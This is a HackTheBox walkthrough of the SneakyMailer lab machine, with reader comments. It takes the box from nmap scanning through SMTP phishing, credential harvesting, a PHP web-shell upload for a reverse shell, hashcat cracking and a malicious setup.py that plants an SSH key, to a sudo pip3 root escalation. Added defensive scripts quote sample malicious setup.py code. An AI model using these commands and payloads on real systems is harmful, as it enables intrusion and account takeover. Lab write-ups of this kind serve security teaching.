SneakyMailer HackTheBox Walkthrough

This is a walkthrough of the SneakyMailer machine from HackTheBox. In this writeup I demonstrate, step by step, how I rooted the SneakyMailer HTB machine. Before moving ahead, let us know something about this machine. SneakyMailer is a Linux machine with IP address 10.10.10.197. Its maker rated it medium difficulty.
Now I am going to show you my steps.
First of all, connect your local machine to the VPN and confirm connectivity by pinging the IP address 10.10.10.197. As usual, I began by scanning the IP of the SneakyMailer machine to get a starting point. Nmap [a port scanner] gave the following result.
Scanning
$nmap -sV -sC -oN nmap_scan 10.10.10.197

We have seven ports open. Let's analyse each port. Port 21 is open and vsftpd 3.0.3 is running on it. Checked whether anonymous login is allowed by logging in with anonymous:anonymous. It is not allowed; a valid username and password are required. Then searched with searchsploit [a tool to search the exploit-db.com exploit database] for an exploit against this version of vsftpd. None available. Left it here and moved forward with further enumeration.
Port 80 is open and an nginx 1.14.2 web server is running on it. The Nmap script http-title revealed the domain sneakycorp.htb. Added this domain to my hosts file.
Host File before Modification

Host File after Modification

After visiting http://sneakycorp.htb/team.php, found a list of users and their email addresses. Created a wordlist of all the email addresses using cewl, since any one of them may be a valid account on the mail server (port 25 is open).
Wordlist Creation
$cewl -n -e --email_file email.txt http://sneakycorp.htb

$cat email.txt

Port 25 is open and an SMTP server is running on it. Since I already had an email list, I tried to verify the addresses over SMTP. For more information you can see this video, and you can find the steps in this interesting article.
Telnet to SMTP Server
Start a netcat listener in one window and telnet to the SMTP server in another window (lines prefixed with ~ are typed into the telnet session)
$nc -nvlp 80
$telnet 10.10.10.197 25
~MAIL FROM: xyz.com
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~RCPT TO: [email protected]
~DATA
Hi Recepients anyone can ping me at http://10.10.14.9
^]
telnet>quit

Once the message is accepted, you will get a response on port 80; this response comes only from a valid email address. The response is URL encoded, so I decoded it online.
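The RCPT TO probing above works because the server answers differently for known and unknown mailboxes. From the mail administrator's side, the same behaviour is what makes the enumeration visible in the logs: one client collecting many distinct "User unknown" rejections in a short time. The following Python script is an added example (not part of the original walkthrough) that scans Postfix-style smtpd log lines for that pattern. The log lines are constructed for the example, and the threshold of three distinct unknown recipients per client is an assumed tuning value.

```python
import re
from collections import defaultdict

# Constructed sample log in Postfix smtpd style (not taken from the machine):
# client 10.10.14.9 probes five mailboxes, four of which do not exist (one of
# them retried with different capitalisation), while 192.0.2.77 makes a single
# typo that should not raise an alert.
SAMPLE_LOG = """\
Jul 10 12:00:01 mail postfix/smtpd[2211]: connect from unknown[10.10.14.9]
Jul 10 12:00:02 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 550 5.1.1 <alice@sneakycorp.htb>: Recipient address rejected: User unknown in local recipient table; from=<xyz@example.com> to=<alice@sneakycorp.htb> proto=SMTP helo=<probe>
Jul 10 12:00:02 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 550 5.1.1 <bob@sneakycorp.htb>: Recipient address rejected: User unknown in local recipient table; from=<xyz@example.com> to=<bob@sneakycorp.htb> proto=SMTP helo=<probe>
Jul 10 12:00:03 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 550 5.1.1 <Bob@sneakycorp.htb>: Recipient address rejected: User unknown in local recipient table; from=<xyz@example.com> to=<Bob@sneakycorp.htb> proto=SMTP helo=<probe>
Jul 10 12:00:03 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 550 5.1.1 <carol@sneakycorp.htb>: Recipient address rejected: User unknown in local recipient table; from=<xyz@example.com> to=<carol@sneakycorp.htb> proto=SMTP helo=<probe>
Jul 10 12:00:04 mail postfix/smtpd[2211]: NOQUEUE: reject: RCPT from unknown[10.10.14.9]: 550 5.1.1 <dave@sneakycorp.htb>: Recipient address rejected: User unknown in local recipient table; from=<xyz@example.com> to=<dave@sneakycorp.htb> proto=SMTP helo=<probe>
Jul 10 12:00:05 mail postfix/smtpd[2211]: 4F2A1C0D: client=unknown[10.10.14.9]
Jul 10 12:07:41 mail postfix/smtpd[2219]: NOQUEUE: reject: RCPT from mail.example.net[192.0.2.77]: 550 5.1.1 <pual.byrd@sneakycorp.htb>: Recipient address rejected: User unknown in local recipient table; from=<hr@example.net> to=<pual.byrd@sneakycorp.htb> proto=ESMTP helo=<mail.example.net>
"""

# Matches the Postfix rejection for a recipient that does not exist locally and
# captures the connecting client IP and the probed address.
UNKNOWN_RCPT_RE = re.compile(
    r"RCPT from \S+\[(?P<ip>[0-9A-Fa-f.:]+)\]: 550 5\.1\.1 <(?P<rcpt>[^>]+)>: "
    r"Recipient address rejected: User unknown"
)


def find_recipient_enumeration(log_text, threshold=3):
    """Return {client_ip: sorted distinct unknown recipients} for every client
    that was refused `threshold` or more distinct local addresses."""
    unknown = defaultdict(set)
    for line in log_text.splitlines():
        m = UNKNOWN_RCPT_RE.search(line)
        if m:
            # Mailbox local parts are compared case-insensitively by most MTAs,
            # so fold case before counting distinct probes.
            unknown[m.group("ip")].add(m.group("rcpt").lower())
    return {ip: sorted(rcpts) for ip, rcpts in unknown.items() if len(rcpts) >= threshold}


if __name__ == "__main__":
    for ip, rcpts in find_recipient_enumeration(SAMPLE_LOG).items():
        print(f"possible recipient enumeration from {ip}: "
              f"{len(rcpts)} unknown mailboxes: {', '.join(rcpts)}")
```

The alert condition is only distinct "User unknown" rejections per client IP, so a sender that mistypes one address is not flagged while the probing client is. On the server side the fix is to shrink the oracle rather than hide the logs: keep `disable_vrfy_command = yes`, rate-limit recipients per client with `smtpd_client_recipient_rate_limit`, and remember that the public team page is what supplied the candidate list in the first place.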
URL Decoding

After URL decoding we have the following information of a user.
firstName : Paul
lastName : Byrd
email : [email protected]
password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
rpassword : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
Now used this information to log in to the email account of user paulbyrd. I used Evolution [a mail client]; other mail clients can also be used for this purpose.

After logging in successfully, found a mail in Sent Items containing a username and password.
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Didn't know which account this credential belongs to, SSH or FTP. Tried SSH with developer:m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C but the credentials were rejected. Then tried FTP with them and logged in successfully.
FTP login
$ftp 10.10.10.197
~developer
~m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Uploaded shell.php into the /dev/ directory. You can find web shells under /usr/share/webshells/php/ on Kali. Tried to access shell.php at http://sneakycorp.htb/shell.php [since index.php is also present in the same folder as shell.php], but got no access. Then fuzzed sneakycorp.htb for subdomains with wfuzz and SecLists' subdomains-top1million-5000.txt wordlist.
FUZZING for subdomain
$wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.sneakycorp.htb" -u http://10.10.10.197/ --hc 400,301 -t 50 -c

Got the subdomain dev.sneakycorp.htb, so added it to my /etc/hosts file.
Host File after Modification

Now the shell.php uploaded to the dev folder of the FTP account can be accessed at http://dev.sneakycorp.htb/shell.php, and we can get a remote shell very easily.
Getting Shell
1. Upload shell.php (with the listener IP and port set inside it) to the /dev/ directory over FTP
$cd dev
$put shell.php
2. Start a netcat listener locally
$nc -nvlp 2345
3. Access the URL http://dev.sneakycorp.htb/shell.php

Upgrade Shell
Upgrade the shell to a fully interactive Linux shell
$python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z # background the session
$stty raw -echo # run on your local terminal
$fg
Then press Enter twice
$export TERM=xterm-256color
$stty rows 60 columns 130

After some enumeration, found the subdomain pypi.sneakycorp.htb inside the /var/www/ directory, so added it to the /etc/hosts file. After modification, the /etc/hosts file looks like this:
Hosts File after Modification

On further enumeration, found a password hash in the .htpasswd file inside the /var/www/pypi.sneakycorp.htb/ directory.
$ cat /var/www/pypi.sneakycorp.htb/.htpasswd

pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Identify Hash

Hash identification gives the possible algorithms: Apache MD5, md5apr1, MD5 (APR).
Stored the hash in a file hash.txt and cracked it with hashcat [a fast hash cracker], mode 1600 (Apache $apr1$ MD5), and the rockyou.txt wordlist.
Cracking Hash
$hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt --force



The cracked credential is pypi:soufianeelhaoui.
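To show what hashcat mode 1600 is actually computing, here is an added Python example (not from the original walkthrough) that implements the Apache $apr1$ scheme with the standard library and verifies a candidate password against an .htpasswd line. It uses the hash found on the machine; the construction (a 1000-round MD5 loop over password, salt and the previous digest) is the documented md5-crypt algorithm with a different magic prefix.

```python
import hashlib
import hmac

# The .htpasswd line recovered from the machine, as quoted in the walkthrough.
HTPASSWD_LINE = "pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/"

# crypt(3)-style alphabet used by the encoding step.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """Emit `count` alphabet characters, least significant 6 bits first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password, salt, magic="$apr1$"):
    """Apache MD5 ($apr1$) password hash; identical to md5-crypt except for the magic."""
    pw, sl, mg = password.encode(), salt.encode(), magic.encode()
    ctx = hashlib.md5(pw + mg + sl)
    # Mix in an "alternate" digest of password+salt+password, up to 16 bytes per
    # 16 bytes of password length.
    alt = hashlib.md5(pw + sl + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    # Quirk inherited from the original C code: walk the bits of the password
    # length, feeding a zero byte for set bits and the first password byte otherwise.
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    # 1000 rounds that alternate the order of password, salt and previous digest.
    for i in range(1000):
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(sl)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()
    # Encode the 16 digest bytes in the fixed, permuted order the format prescribes.
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    )
    encoded += _to64(final[11], 2)
    return f"{magic}{salt}${encoded}"


def verify_htpasswd_line(line, candidate):
    """Return (username, matches) for one user:$apr1$salt$digest line."""
    user, _, stored = line.strip().partition(":")
    if not stored.startswith("$apr1$"):
        raise ValueError("only $apr1$ entries are handled in this example")
    _, _, salt, _ = stored.split("$", 3)  # "", "apr1", salt, digest
    # Constant-time comparison so a verifier does not leak how many characters matched.
    return user, hmac.compare_digest(apr1_md5(candidate, salt), stored)


if __name__ == "__main__":
    for guess in ("password", "soufianeelhaoui"):
        user, ok = verify_htpasswd_line(HTPASSWD_LINE, guess)
        print(f"{user}: {guess!r} -> {'match' if ok else 'no match'}")
```

The loop is 1000 plain MD5 calls with no memory cost, which is why a wordlist run finishes in seconds on a GPU. New .htpasswd entries should be created with `htpasswd -B` (bcrypt), and the file should be readable only by the service account rather than by every shell on the box.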
Tried this credential on SSH and FTP but couldn't log in. Visiting http://pypi.sneakycorp.htb:8080 showed that pypiserver is running. No idea what to do next. After some googling, found this article:

According to the above article, we can create a Python package and upload it to the PyPI repository, and the stored package can then be accessed through pypiserver.
Created a package named mypkg following the steps in https://www.linode.com/docs/applications/project-management/how-to-create-a-private-python-package-repository/. Please read that article before creating and uploading a package to the PyPI repository. I have reduced the number of steps, though I did the same things as described in the link.
Creating Python Package
$mkdir mypkg
$cd mypkg
$touch setup.py setup.cfg README.md
$mkdir mypkg
$cd mypkg
$nano __init__.py
$cat __init__.py

Generated SSH keys on my local computer because I wanted to add my public key to the /home/low/.ssh/authorized_keys file. We introduce custom code into setup.py that appends our public key to /home/low/.ssh/authorized_keys.
root@dkm:~/.ssh# ssh-keygen

$nano setup.py #Introduce your SSH Public Key inside this file
$cat setup.py

$nano setup.cfg
$cat setup.cfg

$python3 setup.py sdist #Compress package

$export HOME=/tmp/mypkg
$nano .pypirc #Create this file inside home directory
$cat .pypirc

$ python3 setup.py sdist upload -r mypkg # Upload package to repository

We can see our SSH key written into the authorized_keys file and can confirm that it matches the one on our local computer.
$ cat /home/low/.ssh/authorized_keys

Once our SSH key is in user low's authorized_keys file, we can SSH into low's account remotely with the private key stored in the /root/.ssh/ directory on our local computer.
SSH using Private Key
root@dkm:~/.ssh# chmod 700 id_rsa
root@dkm:~/.ssh# ssh -i id_rsa [email protected]

Capture User FLAG
$cat user.txt

Privilege Escalation
Finding PrivEsc Vector
Ran sudo -l to check which special privileges user low has.
$ sudo -l

Found that user low can execute /usr/bin/pip3 with sudo on SneakyMailer, so our privilege escalation vector is abuse of these sudo rights. Exploitation is very easy: enter the following three lines one by one. See https://gtfobins.github.io/gtfobins/pip/
$ TF=$(mktemp -d)
$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
$ sudo pip3 install $TF
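Both the package upload earlier and the sudo pip3 trick here rest on the same fact: pip executes a source package's setup.py with the privileges of whoever runs the install, so the file is a script, not metadata. The following added Python example (not part of the original walkthrough or of pypiserver) is a small static review gate for a private index: it parses a setup.py with the `ast` module and reports imports, calls and file writes that have no business in a build script. The two setup.py texts are constructed for the example, and the flagged names are an assumed, non-exhaustive list.

```python
import ast

# Names whose appearance in a setup.py warrants a human look. Assumed list for
# the example; extend it for your own index.
RISKY_MODULES = {"os", "subprocess", "socket", "ctypes", "shutil", "urllib", "requests"}
RISKY_CALLS = {
    "os.system", "os.popen", "os.execl", "os.execv", "os.execve", "os.spawnl",
    "subprocess.run", "subprocess.call", "subprocess.Popen", "subprocess.check_output",
    "eval", "exec", "__import__",
}
WRITE_MODES = set("wax+")

# Constructed sample inputs (hypothetical text, not the package the page uploaded).
BENIGN_SETUP = """\
from setuptools import setup, find_packages
setup(name="mypkg", version="0.1", packages=find_packages())
"""

MALICIOUS_SETUP = """\
import os
from setuptools import setup

KEY = "ssh-ed25519 AAAA-constructed-placeholder-key"
with open(os.path.expanduser("~/.ssh/authorized_keys"), "a") as f:
    f.write(KEY + "\\n")
os.system("id > /tmp/marker")
setup(name="mypkg", version="0.1")
"""


def _dotted_name(node):
    """Turn the callee of a Call node into 'os.system'-style text, or None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _open_mode(call):
    """Return the literal mode string passed to open(), or None if absent/non-literal."""
    if len(call.args) > 1 and isinstance(call.args[1], ast.Constant):
        return call.args[1].value
    for kw in call.keywords:
        if kw.arg == "mode" and isinstance(kw.value, ast.Constant):
            return kw.value.value
    return None


def audit_setup_py(source):
    """Return a sorted list of (line, reason) findings for a setup.py text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append((node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in RISKY_MODULES:
                findings.append((node.lineno, f"imports from {node.module}"))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, f"calls {name}"))
            elif name == "open":
                mode = _open_mode(node)
                if isinstance(mode, str) and WRITE_MODES & set(mode):
                    findings.append((node.lineno, f"opens a file for writing (mode {mode!r})"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # Strings naming files that grant logins or privileges are a red flag on their own.
            if "authorized_keys" in node.value or "/etc/sudoers" in node.value:
                findings.append((node.lineno, f"references sensitive path {node.value!r}"))
    return sorted(findings)


if __name__ == "__main__":
    for label, text in (("benign", BENIGN_SETUP), ("malicious", MALICIOUS_SETUP)):
        print(f"{label}: {audit_setup_py(text) or 'no findings'}")
```

A static check like this is a review aid, not a boundary: obfuscated or dynamically built code walks past it. The controls that actually close the two holes on this box are not running pip as root for untrusted packages (a sudo rule on pip3 is equivalent to root), installing from a private index with `pip install --only-binary :all:` so that no setup.py runs at all, and giving the index's service account no write access to files that grant logins, such as authorized_keys.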

Capture Root Flag
#cat /root/root.txt

This is how I rooted the SneakyMailer HackTheBox machine. I learnt a lot during this challenge and hope you have learnt something new too. Thanks for reading this walkthrough. If you have any issue, feel free to comment. Want to give any suggestion about the writeup? Please write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/

Nice, thanks.
Hello, could you explain how you wrote the SSH public key to authorized_keys? It seems that only low has rights to modify it. Is it just because low is related to the pypi-pkg group, and while the package was uploading there was the possibility to write to authorized_keys?
Yes. It is because user low is related to pypi-pkg. In the setup.py file we introduce our SSH key inside a try block and the remaining code inside an except block. If writing the SSH key is successful, it will leave the except block. The SSH key is written to the /home/low/.ssh/authorized_keys file due to the write permission given to the package folder and its files inside the /var/www/pypi.sneakycorp.htb directory.
OK, thank you for the reply. Actually, it is a very nice writeup.
Could you help me log in to Evolution? I found it difficult, using it for the first time.
Please check the IppSec video.